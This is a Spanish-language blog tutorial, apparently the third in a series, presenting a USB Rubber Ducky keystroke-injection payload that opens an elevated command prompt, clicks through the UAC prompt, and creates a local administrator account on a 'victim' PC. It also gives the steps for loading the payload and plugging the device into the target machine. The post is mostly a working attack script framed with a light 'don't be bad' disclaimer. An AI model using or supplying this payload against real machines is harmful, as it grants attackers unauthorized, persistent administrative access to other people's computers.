Mi Pato y Yo 3º Parte

Hola a tod@s

En este tercer capítulo de Mi Payo y Yo queremos mejorar el payload que creamos en el capítulo anterior, os pongo en antecedentes, creamos un sencillo payload que nos creaba uan cuenta de usuario en el pc víctima, pero se trataba de una cuenta estandar. En esta ocasión crearemos un usuario con permisos administrativos, con lo que eso conlleva :p

A continuación el código necesario para crear este payload:

Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. REM addlocaluser
  2. DELAY 5000
  3. GUI r
  4. DELAY 50
  5. STRING powershell Start-Process cmd -verb runas
  6. ENTER
  7. DELAY 200
  8. ENTER
  9. DELAY 200
  10. STRING net user braco 1234 /add
  11. ENTER
  12. DELAY 200
  13. STRING net localgroup administradores Braco /add
  14. ENTER
  15. DELAY 200
  16. STRING exit
  17. ENTER

    Como es habitual, enumeraramos los  pasos:

    1º Crear el payload en un archivo de texto.
    2º Encodear el archivo de texto.
    3º Cargar el binario creado en la tarjeta memoria de Rubber Ducky.
    4º Pichar el Rubber Ducky en el pc de la víctima.


    Para poder entender mejor los conceptos os dejo con el video, recordad que estos videos estarán disponibles en nuestro Canal de Youtube o en próximos artículos, no olvidéis suscribiros al canal de Youtube, así como feed y demás redes sociales para estar al tanto de las novedades.




    No seáis malos. 

    Share this

    Related Posts

    2 comentarios

    comentarios

    :)
    :(
    hihi
    :-)
    :D
    =D
    :-d
    ;(
    ;-(
    @-)
    :P
    :o
    :>)
    (o)
    :p
    :-?
    (p)
    :-s
    (m)
    8-)
    :-t
    :-b
    b-(
    :-#
    =p~
    $-)
    (y)
    (f)
    x-)
    (k)
    (h)
    cheer